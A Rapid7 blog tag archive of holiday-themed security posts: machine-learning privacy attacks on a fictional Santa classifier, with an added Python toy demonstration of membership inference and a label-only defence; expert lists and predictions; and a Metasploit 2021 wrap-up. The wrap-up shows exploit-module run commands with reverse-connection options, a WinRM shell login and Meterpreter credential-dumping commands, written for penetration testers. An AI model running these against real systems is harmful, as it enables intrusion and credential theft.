Tag Archives: Hacky Holidays 2021

Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa’s List

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2022/01/14/being-naughty-to-see-who-was-nice-machine-learning-attacks-on-santas-list/

Editor’s note: We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

Santa’s task of making the nice and naughty list has gotten a lot harder over time. According to estimates, there are around 2.2 billion children in the world. That’s a lot of children to make a list of, much less check it twice! So, like many organizations with big data problems, Santa has turned to machine learning and built a classifier from his historical naughty and nice lists. The algorithm now decides whether each child gets the gifts they asked for or a lump of coal.

Santa’s lists have long been a jealously guarded secret. After all, being on the naughty list can turn one into a social pariah. Thus, Santa has very carefully protected his training data — it’s locked up tight. Santa has, however, made his model’s API available to anyone who wants it. That way, a parent can check whether their child is on the nice or naughty list.

Santa, being a just and equitable person, has already asked his data elves to tackle issues of algorithmic bias. Unfortunately, the data elves have overlooked two issues in machine learning security: membership inference and model inversion.

Membership inference attacks

Membership inference is a class of machine learning attacks that lets a naughty attacker query a model and ask, in effect, “Was this example in your training data?” Using the techniques of Salem et al. or a tool like PrivacyRaven, an attacker can train an attack model that determines whether or not the target model has seen a given example before.

From a technical perspective, we know that models memorize some of their training data, so they tend to be more confident in their predictions on examples they have seen before than on examples they have not. The attack exploits that gap. First, we build a dataset for a “shadow” model, a model that approximates Santa’s nice/naughty classifier but is trained on data that we have collected and labeled ourselves.

We then query the shadow model with its own training data and label each output (the returned probabilities, for example) “True”: this example was in the training set. Next, we run data the shadow model was not trained on through it and label those outputs “False”: not in the training set. Whether these in-training and out-of-training examples are nice or naughty does not matter; only whether they were in the shadow model’s training set does. On this labeled set of outputs we train a simple attack model that answers the yes-or-no question “Was this in the training data?” Because the shadow model behaves like Santa’s, the attack model transfers: we feed real inputs to Santa’s API, hand its outputs to the attack model, and learn whether Santa’s model was trained on them. In effect, this de-anonymizes the historical nice and naughty lists!

Model inversion

Being able to take some inputs and de-anonymize them is fun, but what if we could get the model to just tell us all its secrets? That’s where model inversion comes in! Fredrikson et al. proposed model inversion in 2015 and opened up the realm of possibilities for extracting data from models. Model inversion seeks to take a model and, as the name implies, turn the outputs we can see back into the training inputs. Today, data extraction has been done at scale by the likes of Carlini et al., who managed to extract memorized training data from large language models like GPT-2.

In model inversion, we aim to extract memorized training data from the model. This is easier with generative models than with classifiers, but a classifier can be used as a component of a larger model such as a Generative Adversarial Network (GAN). We sample the generator, requesting text or images, and then use the membership inference attack described above to identify which outputs are more likely to belong to the training set. Iterating this process produces progressively more training-set-like outputs and, in time, memorized training data.

Note that model inversion is a much heavier lift than membership inference and cannot be carried out against every model every time. But for models like Santa’s, where the training data is so sensitive, it is worth considering how much might be exposed! To date, model inversion has largely been demonstrated in lab settings against text generation and image classification models, so whether it would work against a binary classifier like Santa’s remains an open question.

Mitigating model mayhem

Now, if you’re on the other side of this equation and want to help Santa secure his models, there are a few things you can do. First and foremost: log, log, log! To carry out either attack, the attacker needs query access to the model, or to a very good approximation of it, and building the attack takes many queries. If you see a suspicious number of queries from one source, you can filter IP addresses or rate limit. Additionally, returning only the label, “naughty” or “nice”, instead of the probabilities removes the confidence signal both attacks rely on and makes them more difficult. It does not eliminate them: label-only membership inference attacks exist, so treat this as raising the attacker’s cost rather than as a complete fix.
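The shadow-model attack from the “Membership inference attacks” section, together with the label-only mitigation from the paragraph above, as an added worked example; this is not code from the original post or from PrivacyRaven. It assumes a toy stand-in for Santa’s classifier: a logistic regression over 96 constructed binary “behaviour” features, trained on a deliberately tiny set so that it overfits, exposed once through a probability-returning API and once through a label-only API. All function and variable names are the example’s own, and the attack model is the simplest form of the attack, a single threshold on the model’s top confidence fitted on the shadow model, rather than a trained attack classifier.

```python
import math
import random

# Constructed toy setting (not the post's code): each record is a vector of 96
# binary "behaviour" features encoded as +1/-1, labelled nice (1) or naughty (0).
# The training set is tiny on purpose (far fewer records than features) so that
# the model memorises it, which is the behaviour membership inference exploits.
FEATURES = 96
N_TRAIN = 32

def make_dataset(n, rng):
    """Synthetic records; the label depends only weakly on the first 16 features."""
    data = []
    for _ in range(n):
        x = [rng.choice((-1.0, 1.0)) for _ in range(FEATURES)]
        score = sum(x[:8]) - sum(x[8:16]) + rng.gauss(0.0, 5.0)
        data.append((x, 1 if score > 0 else 0))
    return data

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z)) if z >= 0 else math.exp(z) / (1.0 + math.exp(z))

def train_logreg(data, epochs=400, lr=0.3):
    """Unregularised logistic regression by full-batch gradient descent. With more
    features than records it separates the training set and keeps pushing the
    training records' confidences toward 1.0."""
    w, b = [0.0] * FEATURES, 0.0
    for _ in range(epochs):
        gw, gb = [0.0] * FEATURES, 0.0
        for x, y in data:
            err = sigmoid(sum(wj * xj for wj, xj in zip(w, x)) + b) - y
            for j, xj in enumerate(x):
                gw[j] += err * xj
            gb += err
        w = [wj - lr * g / len(data) for wj, g in zip(w, gw)]
        b -= lr * gb / len(data)
    return w, b

def proba_api(model, x):
    """Santa's API as the post describes it: returns P(nice)."""
    w, b = model
    return sigmoid(sum(wj * xj for wj, xj in zip(w, x)) + b)

def label_only_api(model, x):
    """Hardened API: the label and nothing else."""
    return "nice" if proba_api(model, x) >= 0.5 else "naughty"

def confidence(api, model, x):
    """Attack feature: how sure the model is of the label it returned. A label-only
    API leaks no such signal, so every query scores the constant 1.0."""
    out = api(model, x)
    return 1.0 if isinstance(out, str) else max(out, 1.0 - out)

def membership_guesses(api, model, threshold, members, non_members):
    pairs = [(confidence(api, model, x) >= threshold, True) for x, _ in members]
    pairs += [(confidence(api, model, x) >= threshold, False) for x, _ in non_members]
    return pairs  # (guessed member?, actually member?) per record

def fit_threshold(api, shadow_model, shadow_in, shadow_out):
    """Choose the confidence threshold that best separates the shadow model's own
    training records (shadow_in) from records it never saw (shadow_out)."""
    scores = {confidence(api, shadow_model, x) for x, _ in shadow_in + shadow_out}
    best_t, best_acc = 1.0, -1.0
    for t in sorted(scores):
        pairs = membership_guesses(api, shadow_model, t, shadow_in, shadow_out)
        acc = sum(g == truth for g, truth in pairs) / len(pairs)
        if acc > best_acc:
            best_t, best_acc = t, acc
    return best_t

def attack_accuracy(api, target_model, threshold, members, non_members):
    """Transfer the shadow-fitted threshold to the real target model."""
    pairs = membership_guesses(api, target_model, threshold, members, non_members)
    return sum(g == truth for g, truth in pairs) / len(pairs)

def run_experiment(seed=7):
    rng = random.Random(seed)
    santa_train = make_dataset(N_TRAIN, rng)   # the jealously guarded historical list
    santa_model = train_logreg(santa_train)    # the model behind the public API
    shadow_in, shadow_out = make_dataset(N_TRAIN, rng), make_dataset(N_TRAIN, rng)
    shadow_model = train_logreg(shadow_in)     # attacker's approximation of Santa's model
    outsiders = make_dataset(N_TRAIN, rng)     # children Santa never trained on
    results = {}
    for name, api in (("probabilities", proba_api), ("label_only", label_only_api)):
        t = fit_threshold(api, shadow_model, shadow_in, shadow_out)
        results[name] = attack_accuracy(api, santa_model, t, santa_train, outsiders)
    mean_conf = lambda data: sum(confidence(proba_api, santa_model, x) for x, _ in data) / len(data)
    results["member_conf"], results["outsider_conf"] = mean_conf(santa_train), mean_conf(outsiders)
    return results

if __name__ == "__main__":
    for key, value in run_experiment().items():
        print(f"{key}: {value:.3f}")
```

Run it and compare the `probabilities` figure with the `label_only` one: against the full-probability API the threshold fitted on the attacker’s shadow model separates Santa’s training records from outsiders well above chance, because the memorised records come back with systematically higher confidence (`member_conf` versus `outsider_conf`). Against the label-only API every answer carries the same confidence, so the same attack collapses to a coin flip (0.5). A real attacker would feed the shadow model’s full output vectors to a small classifier instead of a single threshold, and would also try label-only variants, which is why the mitigation raises cost rather than closing the hole.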

For extremely sensitive applications, training with differential privacy, for example with DP-SGD, can make these attacks much harder to carry out, but be aware that differentially private training comes with some accuracy loss. As a result, you may end up with some nice children on the naughty list and a naughty hacker on your nice list.

Santa making his list into a model will save him a whole lot of time, but if he’s not careful about how the model can be queried, it could also lead to some less-than-jolly times for his data. Membership inference and model inversion are two types of privacy-related attacks that models like this may be susceptible to. As a best practice, Santa should:

  • Log information about queries like:
    • IP address
    • Input value
    • Output value
    • Time
  • Consider differentially private model training
  • Limit API access
  • Limit the information returned from the model to label-only


Get the latest stories, expertise, and news about security today.

More Hacky Holidays blogs

The 2021 Naughty and Nice Lists: Cybersecurity Edition

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/01/10/the-2021-naughty-and-nice-lists-cybersecurity-edition/

It’s not just Santa who gets to have all the fun — we in the security community also love to make our lists and check them twice. That’s why we asked some of our trusty cybersecurity go-to’s who and what they’d place on their industry-specific naughty and nice lists, respectively, for 2021. Here’s who the experts we talked to would like to give a super-stuffed stocking filled with tokens of gratitude — and who’s getting a lump of coal.

The nice list

Call me boring, but I am pretty stoked about the Minimum Viable Security Product (MVSP), the vendor-neutral checklist for vetting third-party companies. It has questions like whether a vendor performs annual comprehensive penetration testing on systems, complies with local laws and regulations like GDPR, implemented single sign-on, applies security patches on a frequent basis, maintains a list of sensitive data types that the application is expected to process, keeps an up-to-date data flow diagram indicating how sensitive data reaches the systems, and whether vendors have layered perimeter controls or entry and exit logs for physical security. Its success depends on people using it, and this industry tends to be allergic to checklists, but it strikes me as super important. – Fahmida Y. Rashid, award-winning infosec journalist

Editor’s note: Check out our Security Nation podcast episode with Chris John Riley on his work helping develop MVSP.

All of the security researchers that have focused their research and efforts to identify vulnerabilities and security issues within IoT technology over the last year. Their efforts have helped bring focus to these issues, which has led to improvements in products and processes in the IoT industry. – Deral Heiland, IoT Research Lead at Rapid7

Increased federal government focus on securing critical infrastructure. Examples: pipeline and rail cybersecurity directives, energy sector sprints, cybersecurity funding in the infrastructure package. – Harley Geiger, Senior Director of Public Policy at Rapid7

Huntress Labs and the Reddit r/msp board for their outstanding, tireless support for those responding to the Kaseya mass ransomware attack. While the attack was devastating, the community coalesced to help triage and recover, showing the power we have as defenders and protectors when we all work together. – Bob Rudis, Chief Security Data Scientist at Rapid7

The January 20th swearing-in of Biden is on the nice list, not because of who won but the fact that the election worked. We’ve talked an excessive amount about election security, but the reality is, there was no big deal. It was a largely unremarkable election even in the abnormal environments of the pandemic and the cyber. Election computers will continue to be wildly insecure, but since we’ve got paper trails, it won’t really matter. – Rob Graham, CEO of Errata Security

The naughty list

The Colonial Pipeline and Kaseya attacks are far above any other “naughty” case. They affected millions of people around the world. However, like the big things from past years, I think it’ll be solved by lots of small actions by individuals rather than some big Government or Corporation initiative. No big action was needed to solve NotPetya or Mirai; no big action will be needed here. Those threatened will steadily (albeit slowly) respond. – Rob Graham, CEO of Errata Security

Microsoft, bar none. They bungled response to many in-year critical vulnerabilities, putting strain on already beat up teams of protectors, causing many organizations to suffer at the mercy of attackers. Everything from multiple, severe Exchange vulnerabilities, to unfixable print spooler flaws, to being the #1 cloud document service for hosting malicious content. – Bob Rudis, Chief Security Data Scientist at Rapid7

The whole Pegasus spyware from NSO Group is bad news start to finish, but the fact that the ruler of United Arab Emirates used the spyware on his wife in a custody battle? That was just flabbergasting. We talk about stalkerware and other types of spyware — but when you have something like Pegasus just showing up on individual phones, that is downright frightening. – Fahmida Y. Rashid, award-winning infosec journalist

All manufacturers of IoT technology that have not heeded the warnings, taken advantage of the work done by IoT security researchers to improve their product security, or made efforts to build and improve their internal and external processes for reporting and remediating security vulnerabilities within their products. – Deral Heiland, IoT Research Lead at Rapid7

Apparent lack of urgency to provide support and phase in requirements for healthcare cybersecurity, despite ransomware proliferation during the pandemic. – Harley Geiger, Senior Director of Public Policy at Rapid7


2022 Cybersecurity Predictions: The Experts Clear Off the Crystal Ball

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/01/06/2022-cybersecurity-predictions-the-experts-clear-off-the-crystal-ball/

As we walk through the doorway of 2022, it’s hard not to wish at least some among us had the gift of cosmic foresight. Many (most?) of the questions we thought in 2021 that we’d have answered by this point — chief among them, when will COVID finally leave us alone??? — still seem to elude us.

In keeping with our yearly tradition, we sat down with some experts at Rapid7 and across the industry to get their 2022 cybersecurity predictions. Here’s a look at what those in the know — some of them under the guise of clever fortune-teller names — think we’ll be talking about in the year to come.

Rob la Mystique (a.k.a. Robert Graham, CEO of Errata Security)

My third eye tells me that ransomware will become state-sponsored. Governments will notice the successful actors in their countries, and rather than shut them down, they’ll seek to co-opt their activities. In other words, pirates will be coopted into privateers.

Fahmida Y. Rashid, award-winning infosec journalist

I think we will see some surprising consolidation — some giant merger that’s going to dwarf even the ones we’ve seen so far. There’s still going to be insane venture funding rounds (like Transmit Security’s Series A) for security startups. But I think my prediction is that we are going to see the pendulum swing back from tools that do one thing well to large suites/integrated platforms that do all kinds of things, so the whole buying landscape is going to get even more murky and confusing.

Tod Beardsley, Director of Research at Rapid7

In 2022, managed service providers (MSPs) will continue to be in the hot seat as intermediary targets for ransomware gangs. The efficacy of hitting MSPs was proven out in 2021, and even small, regional MSPs will need to stay on their toes with patches and two-factor authentication everywhere to avoid getting exploited and phished by attackers who are targeting their downstream customers.

As cryptocurrency valuations continue to separate themselves from any realistic evidence of value, we will see more and more exchanges and clearinghouses get compromised, resulting in heists of millions of dollars’ worth of crypto — especially among off-shore exchanges.

Cyber-Zoltar the Blockchain Seer (a.k.a. Philip Amann, Head of Strategy at the European Cybercrime Center)

Ransomware will continue to dominate and proliferate with cybercriminals further moving toward a more calculated target selection. As is evidenced by several high-profile ransomware attacks, this has created a global cybersecurity risk that goes beyond the financial impact of these attacks. This will continue to be supported by a professional underground economy that provides the necessary tools and services.

We also expect investment fraud, BEC and CEO fraud to continue to cause disruptive losses and also a significant increase in mobile malware. The response to these threats will require us to further strengthen collaboration among law enforcement, industry, the CSIRT community, and academia globally with a view to collectively increasing cybersecurity, safety, and resilience.

Bob Rudis, Chief Security Data Scientist at Rapid7

The 2022 US election season will drive multiple (some impactful) cyberattacks on candidate/party technical and campaign logistics infrastructure and data from US-based sources.

Meanwhile, as companies accelerate toward a higher office-vs.-remote work ratio, initial access brokers will take advantage of the mobility (and weaknesses) in BYOD endpoints to gain footholds and refresh credentials and PII data stores. Multiple, major breaches will be reported.

In addition, the adoption of Software Bill of Materials (SBOM) will be astonishingly fast (in the US) toward the latter half of the year, heralding a new era of better third-party risk management and overall organizational safety and resilience.

Erick Galinkin, Principal Artificial Intelligence Researcher at Rapid7

Ransomware will continue to be a huge threat and will draw even more attention in 2022. While we should keep an eye out for potential attempts to disrupt a major US government agency, the revenue lost from ransomware will still be an order of magnitude less than business email compromise.

The media world and the security world will do their gnashing of teeth and rending of garments over deepfakes ahead of the 2022 midterms, but AI-powered disinformation will continue to be a mostly hypothetical threat.

Madame Bell LaPadula (a.k.a. Wendy Nather, Head of Advisory CISOs at Cisco)

On the heels of more visibility in supply chain security, and against the backdrop of steady disruption from ransomware, the security industry will have to face another maturity touchstone. It’s not enough simply to provide more transparency and share more data: what else do we owe one another in this broad ecosystem? SBOMs are the new shiny, but we will have to take many more steps together to improve our common, global defense.

Harley Geiger, Senior Director of Public Policy at Rapid7

State and federal agencies will step up their enforcement of existing cybersecurity regulations. This includes the SEC’s enforcement of required disclosures related to cybersecurity, DOJ’s enforcement of federal contractor cybersecurity requirements, and California’s enforcement of the CCPA.

But while regulators may issue new cybersecurity rules for the private sector under existing authorities, Congress will delay creating new federal authorities due to the midterm election year and the recent passage of large spending and incident reporting bills. Divisive items like federal privacy legislation are unlikely to pass. However, there will be plenty of hearings, press releases, and tweets expressing concern for ongoing cybersecurity threats!


Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/

Now that 2022 is fully underway, it’s time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization’s infrastructure secure — even in the face of some of the most difficult threats the security community has dealt with in recent memory. Here’s a rundown of some of our biggest moments in that effort from 2021.

Emergent threats and vulnerability disclosures

As always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let’s revisit some of the highlights.

Emergent threat reports

Vulnerability disclosures

Research and policy highlights

That’s not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.

The Rapid7 family keeps growing

Throughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the Insight Platform the one-stop shop for your security program.

Industry accolades

We’re always thrilled to get industry recognition for the work we do helping protectors secure their organizations — and we had a few big nods to celebrate in 2021.

Keeping in touch

Clearly, we had a pretty busy 2021 — and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.

Stay tuned for more great content, research, and much more in 2022!


Metasploit 2021 Annual Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/01/05/metasploit-2021-annual-wrapup/

As 2022 kicks off, we now have another year in the books. Like years past, 2021 brought some surprises and had its share of celebrity vulnerabilities and recurring trends. Let’s highlight some statistics!

Quick stats

  • 651 merged pull requests from 113 users
  • 184 new modules
    • 102 exploits, 45 post, 32 auxiliary, 3 payload, and 2 evasion
  • 1 Metasploit Community CTF hosted
    • 1,501 users registered across 727 teams
    • 18 total challenges
    • 1,264 correct challenge submissions

URI support

As of Metasploit 6.1.4, users can supply URI strings as arguments to the run command, specifying the RHOST value and other option values at once:

use exploit/linux/postgres/postgres_payload
run postgres://administrator:[email protected] lhost= lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters. Support includes HTTP, MySQL, PostgreSQL, SMB, SSH, and more; check out the full announcement post.

Sessions without payloads

AV evasion is a hard problem that’s not going to be solved in the foreseeable future. Payloads are caught in a variety of ways by a variety of AVs. One sustainable approach Metasploit is attempting to take is to enable users to leverage sessions that don’t require payload code to be running on the target. While not always a feasible solution, when it is, it can be quite reliable.

Earlier in 2021, community member smashery took on a large effort to enable Metasploit users to obtain interactive command shell sessions using Microsoft’s WinRM. The result is an improvement that enables the scanner/winrm/winrm_login module to open a command shell session without uploading a payload to the target. That session can then, of course, be used with any post module that is compatible with shell sessions.

msf6 auxiliary(scanner/winrm/winrm_login) > run username=Administrator password=pass rhost=

[!] No active DB -- Credential data will not be saved!
[+] - Login Successful: WORKSTATION\Administator:pass
[*] Command shell session 4 opened ( -> ) at 2021-12-17 14:14:25 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

In a similar vein, Metasploit has for a while now been able to open command shell sessions from the scanner/ssh/ssh_login module. These command shell sessions can also be used with post modules that don’t require a full Meterpreter session. However, one notable feature these SSH sessions lacked until 2021 was the ability to port-forward over the connection. Last year saw improvements to Metasploit’s handling of SSH sessions that enable both standard port forwarding (for client connections) and reverse port forwarding (for server connections). Being fully wired into Metasploit, so to speak, means users can route connections over these sessions using the route command, the same way they can with Meterpreter sessions.

We hope these new capabilities provide users with more options to perform their testing from Metasploit while keeping payloads entirely out of memory.

Evasion modules

Evasion modules are one of Metasploit’s most infrequently added types, but they are certainly noteworthy when they are added. Last year saw two such modules added, both targeting Windows executables. The first module, based on Johnny Shaw’s work, implemented Process Herpaderping. This novel technique obfuscates the payload’s main logic from security products. This technique was effective for a few months but was ultimately added as a detection to Windows Defender.

Another evasion module added this year was kensh1ro’s syscall module. Using direct system calls is a popular technique to evade user-mode analysis hooks, and this module brings the capability to Metasploit, too.

RDLL exploit improvements

Last year, the post-exploitation library used by quite a few Windows local exploits saw a great improvement that reduced duplicated code and laid the foundation for randomizing the target process used to host the injected DLL. Prior to this, most exploits started notepad using a piece of template code that would then load the reflective DLL (RDLL) and, when successful, execute the payload. This often led to a notepad process making network calls, which is pretty easily identified as malicious behavior. Instead, these modules now randomly select a binary from a list and automatically start a process of the correct architecture. No more notepad instances making network calls from exploits. Currently, the new implementation randomly selects between msiexec and netsh, both of which are widely available across Windows versions and are less likely to be flagged when making network connections.

Kubernetes support

It’s safe to say that cloud computing is here to stay. In 2021, Metasploit added its first modules that target the Kubernetes platform. The first is an auxiliary module that enumerates namespace, pod, and secret information. Following it is an exploit module that, when provided the necessary credentials, executes a payload within a pod. In a similar vein to the payload-less post-exploitation capabilities mentioned above, this module can also open a direct command shell session using a new, native WebSocket implementation. We hope these modules help Metasploit users who are testing these environments, and we look forward to expanding on the capabilities in 2022.

Session validation

Being a framework, Metasploit offers a variety of payloads and session types. Unfortunately, not every payload yields a session type with the same capabilities (e.g. the PHP Meterpreter does not offer Kiwi). This can be very confusing for users as they’re attempting to use various post modules and Meterpreter commands. Last year, Metasploit improved the way this is handled and now offers concise error messages when certain capabilities are missing or can’t be performed with a particular session type. Now running a Meterpreter command that’s either unsupported or provided by an extension that hasn’t been loaded will be reported as such.

meterpreter > creds_all
[-] The "creds_all" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/osx)
[-] The "kiwi" extension is supported by the following Meterpreter payloads:
[-]   - windows/x64/meterpreter*
[-]   - windows/meterpreter*

Improved SMB capture server

SMB1 has not been enabled by default in Windows 10 since 2017. Last year, Metasploit began the long process of updating its SMB server capabilities to work with the modern SMB 2 and SMB 3 versions. The first milestone upgraded the capture server (auxiliary/server/capture/smb), which collects authentication information from incoming client connections, to accept connections from SMB 2 and SMB 3 clients. Today, the capture server works against modern versions of Windows in their default configuration.

New module highlights

  • exploits/windows/http/exchange_proxylogon_rce – This was the first of two high-profile Exchange RCEs added to Metasploit and highlighted the need for administrators to stay on top of patching their on-premises Exchange servers or migrate.
  • exploit/multi/http/git_lfs_clone_command_exec – This exploit brought along with it new capabilities for Metasploit to act as a malicious Git server. This opens the door for future modules to exploit similar vulnerabilities.
  • exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe (https://github.com/rapid7/metasploit-framework/pull/15567) – eBPF has been a popular target for Linux LPEs this year. This particular exploit, based on @chompie1337’s original research, was particularly valuable due to the number of platforms it affected as well as its reliability. Speaking of reliability…
  • exploits/linux/local/sudo_baron_samedit – Being January 2022, this particular celebrity vulnerability seems like old news. At the time, however, it gained quite a bit of attention, as it was in the ever-prevalent sudo utility. One quality that made this exploit particularly valuable was that there is no risk of system instability while exploiting it. This will likely remain a go-to exploit for users needing to escalate on Linux systems in years to come.
  • auxiliary/gather/windows_secrets_dump – While not technically a new module, this particular entry saw a massive improvement in its addition of support for targeting Domain Controllers. This was a monumental effort that included a foundation that also makes it easier for modules to run attacks over DCERPC (think PrintNightmare and ZeroLogon).
  • exploit/multi/http/cve_2021_35464_forgerock_openam – Any unauthenticated RCE in an application that’s intended to be an IAM solution is worth calling out.
  • post/windows/gather/credentials/windows_sam_hivenightmare – This was another highly reliable privilege escalation technique that could be used to recover sensitive files on Windows systems. The module’s implementation performs the entire operation in memory using Meterpreter, without spawning new processes or dropping artifacts to disk, making it a very stealthy approach.


5 Security Projects That Are Giving Back

Post Syndicated from Jacob Roundy original https://blog.rapid7.com/2022/01/04/5-security-projects-that-are-giving-back/

While it’s always nice to receive gifts, the holiday season is more about giving – whether you’re buying something nice for the people you love or giving back to the community to help ensure others enjoy the holidays as much as you do.

Giving back is exactly what we’ll be focusing on in today’s Hacky Holidays post, as it’s a theme that truly resonates with those in the security industry. From white-hat hackers to those volunteering their time to make the internet a safer, more inclusive space, we’ve highlighted a few security-related projects that exemplify the spirit of giving back.

1. The Innocent Lives Foundation

The Innocent Lives Foundation aims to identify child predators and help bring them to justice. They do this by leveraging the combined power of the information security community to create tools that unmask anonymous child predators online. Then, using the data from Open Source Intelligence and cutting-edge techniques, they build a path to capturing evidence and then pass on those details to law enforcement for them to recreate.

The Innocent Lives Foundation was first started by Chris Hadnagy, who joined us on an episode of our Security Nation podcast back in 2020. He worked on a few cases at Social-Engineer, LLC, that tracked and captured predators who trafficked and exploited children. When he saw the impact these crimes had on innocent people, he knew he had to do something about it. As a leader in the information security community, he chose to rally a group of security experts and professionals in the social engineering field to address these problems and prevent crimes against future victims.

The foundation is serving endangered children and building a world in which all children can live innocent lives. It’s difficult, emotionally taxing work, but it’s making the world a better place, and it’s the perfect example of giving back.

If you’d like to donate to the cause — it can cost up to $10,000 to produce one file to send to law enforcement, so donations are needed and welcomed — you can do so here. Aside from donating, there are numerous other ways to get involved, including reporting a case, sharing support online, or even volunteering your security skills when applications are opened.

2. No More Ransom

Today, ransomware is rampant. This fact won’t surprise anyone working in the security industry, but many normal users around the world don’t know what ransomware is, how to defend against it, and what to do if they fall victim to a scam. That’s where No More Ransom comes into play.

No More Ransom is an initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky, and McAfee with a simple mission: to help victims of ransomware retrieve their encrypted data without paying criminals a single dime in the process.

The initiative aims to achieve this mission in two ways:

  1. By compiling a repository of keys and applications that can decrypt data locked by different types of ransomware
  2. By spreading awareness about ransomware and educating the world about prevention methods they can employ in their daily lives

While it’s not always possible to regain access to files encrypted or systems locked by ransomware, No More Ransom has helped many do exactly that with its repository. And by sharing simple, easy-to-follow cybersecurity advice, the initiative is creating a better-informed world of users who understand how to avoid falling victim to ransomware in the first place.

In the 5 years since its creation, the No More Ransom initiative has:

  • Built a library of 121 free tools
  • Been able to decrypt 151 ransomware families
  • Seen more than 6 million downloads of its tools
  • Prevented $900 million in criminal profit

If you’d like to do your part, the No More Ransom project is always looking for new partners to spread their messaging, so if your organization wants to be more security-minded and give back to the security community in general, consider joining the list of many partners. If you ever fall victim to ransomware, you can also report the crime, which will help identify new types of ransomware and aid future prevention.

3. CIAS Gaming

Established by the University of Texas at San Antonio, the Center for Infrastructure Assurance and Security (CIAS) conducts research into effective ways to engage students with cybersecurity principles through educational gaming — and as part of their work, they’re making cybersecurity relatable, fun, and engaging for kids.

The CIAS Gaming program targets 4 demographics: elementary school, middle school, high school, and colleges and universities. Their mission is to deliver quality research, training, competition, and exercise programs to advance community and organizational cybersecurity capabilities and collaboration.

Currently, the CIAS K-12 Program consists of a few educational tools. These include:

  • A collectible card game and electronic download called Cyber Threat Defender
  • A multiplayer card game for students in third through fifth grade called Cyber Threat Protector
  • A card game for K-2 players with simple design and reinforced concepts called Cyber Threat Guardian
  • An electronic game that teaches techniques for encoding and decoding ciphers to hide or discover information called Project Cipher
  • A testing tool and platform that gives educators a way to create quizzes and introduce students to cybersecurity principles called the Pyramid of Knowledge
  • Interactive activities, like activity sheets and games, introduced to kids by the CyBear cybersecurity mascots

CIAS Gaming is shaping the future of cybersecurity by training the next generation in cybersecurity best practices. You can access and download these tools and games via the links above, or reach out directly to CIAS to learn more about taking part in their competitions or trainings.

4. The Alliance for Securing Democracy

The Alliance for Securing Democracy (ASD) is a nonpartisan initiative housed within the German Marshall Fund of the United States that aims to combat autocratic efforts to undermine and interfere in democratic institutions around the world. The ASD contributes research and analysis on how a range of tools, from cyberattacks and disinformation to support for extremism, are being used to weaken democracies. It also provides public dashboards to expose the effects of online influence networks and the themes being promoted by foreign powers to threaten democratic institutions.

The ASD is independently funded by more than 175 private individuals and small family foundations across the political spectrum. Its team brings together a diverse staff with expertise across industries, including technology and cybersecurity, to provide research, policy recommendations, and even analysis of key issues and threats. It also has a technical advisory committee that features experts on disinformation, cybersecurity, illicit finance, and more.

The ASD has conducted a significant amount of work in the area of cybersecurity. It also has compiled a toolbox to spread awareness on various techniques being used by malign actors. Such tools include:

In a more globalized and digitalized world, the work ASD is doing to protect the strength of free and open societies by shining a light on autocratic tactics, closing vulnerabilities in democratic systems, and imposing costs on those who undermine our institutions is more important than ever. You can reach them at [email protected] or donate to the cause.

5. Code for Social Good

Code for Social Good is a nonprofit organization that partners with other nonprofit companies to provide the technical help they need to achieve their missions for no cost. It’s all about volunteering to promote social good: Code for Social Good has built and fostered a volunteer community that promotes welfare by supporting nonprofits in need. And that global network consists of professionals from across the tech industry, including technical writers, coders, programmers, and more.

Whether you code for fun, experience, social good, or to make a better world, volunteering at Code for Social Good is a great way to give back. Anyone can sign up as a volunteer, and then, you can browse their list of projects. If you find one applicable to your skills, you can apply and wait for contact from the nonprofit. Nonprofits that need help can also post projects on the site and find volunteers to assist them.

As of this writing, Code for Social Good has 138 projects posted across 122 organizations based in 87 countries. The current volunteer community consists of 2,595 volunteers, and they’re always looking for more help. If you have some extra time, why not take a look and see if you can give back by volunteering your technical skills to a nonprofit in need.

Giving back is an important theme of the holidays and one that’s integral to the cybersecurity community. By giving back to the industry, we can encourage a healthy, flourishing practice that spreads awareness, leading to a better, safer, and brighter tomorrow.

If you’re looking for ways to give back, hopefully these examples inspire you to action. If you’d like to stay in the holiday spirit, check out the rest of our Hacky Holidays specials.



Sharing the Gifts of Cybersecurity – Or, a Lesson From My First Year Without Santa

Post Syndicated from Amy Hunt original https://blog.rapid7.com/2022/01/03/sharing-the-gifts-of-cybersecurity-or-a-lesson-from-my-first-year-without-santa/



My kid stopped believing this year.

I did what they recommend: said she was big enough to know the truth, that we are all Santas, and now she must be one, too. Every one of us — whether December means Christmas, Hanukkah, Kwanzaa, or just winter — is expected to give generously and sometimes anonymously, just to spread the goodness. And ideally, we do it a whole lot more than once a year.

Then, the a-ha moment arrived. You know who some of the best Santas on Earth are? The cybersecurity community. It’s full of givers, mostly with names we’ll never know.

